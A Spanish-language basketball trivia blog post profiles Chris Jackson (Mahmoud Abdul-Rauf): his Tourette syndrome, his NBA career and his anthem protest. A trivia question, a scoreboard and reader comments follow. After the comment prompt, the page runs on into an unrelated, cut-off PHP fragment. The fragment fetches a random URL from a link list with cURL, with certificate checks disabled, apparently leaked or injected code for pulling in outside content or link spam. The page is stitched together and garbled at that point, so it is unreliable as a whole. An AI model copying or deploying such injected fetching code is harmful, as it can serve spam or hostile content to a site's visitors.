Trivial #19: Mahmoud Abdul-Rauf, un ejemplo de superación

02 de December de 2009 por TheDeerHunter

Lousiana State University. Finales de los 80. El reino de un tal Chris Jackson. Por encima de nombres como Shaquille Oneal o Stanley Robertson. Un base de 1.85, eléctrico, con un manejo de balón imposible, un lanzamiento preciso y una potencia de piernas acobardante. Mientras anotaba más de 30 puntos por partido, elegido invariablemente como all-american, su habitación en la residencia de atletas estaba forrada de material blando. Era para protegerle de si mismo. Podía llegar a costarle más de diez minutos atarse las zapatillas y ¡ay de aquel imprudente que se ofreciera a ayudarle! Pocos valientes se atrevían a subir a un coche con él como conductor. ¡Y fue capaz en dos ocasiones de ser el líder de la NBA en porcentaje de tiros libres!

Chris Jackson sufría una cruel enfermedad neuronal llamada “Síndrome de Tourette”. Se caracteriza por un espectacular catálogo de reflejos involuntarios “tics”.

Un caso único en la historia del deporte. Los tics que sufría eran tremebundos, muy visibles para millones de espectadores por televisión. Las situaciones que generaba eran difícilmente asumibles para todo aquel que conviviera cerca de él. Una coraza de tics y voces le aislaban del resto de los humanos que no alcanzaban a penetrar en su drama particular.

Uno de los problemas derivados de la enfermedad puede ser el trastorno obsesivo compulsivo. Jackson lo focalizaba hacia su pasión baloncestística. Cuentan que al acabar cada entrenamiento, jamás se iba a la ducha sin anotar 10 canastas limpias seguidas. En muchas se veía obligado a continuar lanzando un número desesperante de tiros porque el 8º o el 9º de cada serie rozaba casi imperceptiblemente el aro… así se entiende mejor como un tipo así puede llegar a ser tan sumamente bueno:

Jugó 9 años en la NBA. 6 de ellos en unos Denver Nuggets que casi diríamos que conservan su marca. Alcanzó a anotar 18 puntos por partido, 2.5 rebotes, 7 asistencias y 1 robo en la 1995-96 y fue elegido como jugador más mejorado. En 1991, Chris Jackson abrazó las creencias musulmanas cambiando su nombre al, conocido por todos, Mahmoud Abdul-Rauf. En una ocasión, se negó a levantarse al escuchar el himno americano. Por este incidente se le recuerda más que por todo lo que fue como jugador. La acción le pasó factura y a partir de ese momento su carrera fue cuesta abajo. Terminó sus días de jugador en Europa, con problemas de sobrepeso a causa de la medicación que se veía obligado a tomar.

Un verdadero ejemplo de superación. Un jugón y un mito.

Punto para DsRomero y nueva pregunta: ¿Qué gran pívot, que se había querellado contra las públicas burlas de la mascota de uno de sus ex-equipos, desapareció de una charla técnica en medio del mismísimo partido inaugural, según dicen, para irse a comprar algo de comer en una de las pizzerias del propio pabellón?

Y la clasificación:

– Sergio: 9 puntos
– Rojorob: 2 puntos
– Kantonyo: 2 puntos
– Hector: 2 puntos
– Univerzee: 1 punto
– Daniel: 1 punto
– Daboal: 1 punto
– DsRomero: 1 punto

Comenta

6 comentarios a esta entrada

  1. Love Denise dice:
    #1

    solo comentar que otro caso que conozco de Sindrome de Tourette en el deporte es el de Tim Howard, portero del Everton de la Premier Inglesa. A nivel ya general, también se dice que Andersen, el escritor de los cuentos infantiles, también la padecía.

      Citar

  2. sergio dice:
    #2

    no sera Charles Barkley?? Recuerdo que le pego a una mascota… pero claro… el de la querella seria la mascota…

      Citar

  3. Lmarich dice:
    #3

    Karl Malone, creo.

      Citar

  4. TheDeerHunter dice:
    #4

    que sepáis que, de momento… ni de coña

      Citar

  5. marccus dice:
    #5

    oliver miller, pivot de Suns, al cambiar de equipo tuvo problemas con el que fue su amigo, la persona que iba dentro del gorila mascota de los de Arizona.

      Citar

  6. TheDeerHunter dice:
    #6

    marccus ha sido llegar y besar el santo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>